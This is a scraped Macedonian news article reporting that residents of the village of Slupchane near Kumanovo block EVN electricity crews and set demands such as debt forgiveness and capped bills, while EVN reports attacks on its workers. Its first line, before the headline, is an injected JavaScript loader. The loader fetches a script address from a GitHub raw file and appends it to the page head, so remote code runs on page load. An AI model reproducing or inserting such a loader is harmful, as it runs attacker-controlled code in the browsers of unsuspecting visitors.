;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Во Слупчане ништо ново - ЕВН не може да влезе без да исполни барања - Антропол
АктуелноЛокално

Во Слупчане ништо ново – ЕВН не може да влезе без да исполни барања

И денеска беше тензично во кумановското село Слупчане. Жителите не им дозволија на екипите на ЕВН да работат на терен и покрај асистенција на полицијата. Како услов за да им дозволат на ЕВН да работат, мештаните доставија до компанијата барања во кои инсистираат:

  • да им бидат простени досегашни долгови што изнесуваат по неколку илјади евра,
  • да добијат бесплатни нови приклучоци,
  • без разлика колку ќе потрошат во иднина да не им се фактурира повеќе од 3.000 денари.
  • верските објекти во селото да не плаќаат струја.
  • на секој крај од селото, таму каде што граѓанинот гради куќа, да му се обезбеди електрична мрежа од страна на ЕВН, а не граѓанинот да плаќа илјадници евра за бандери
  • мерните уреди да не се поставуваат надвор од куќите.

Од ЕВН известуваат дека екипите на Електродистрибуција се соочуваат со вербални и физички напади од страна на жителите, како и целосни блокади за влез во селото и додека не се создадат нормални услови за работа, нема да работат на отстранување на дефекти или, пак, да реализираат редовни работни активности во тој регион.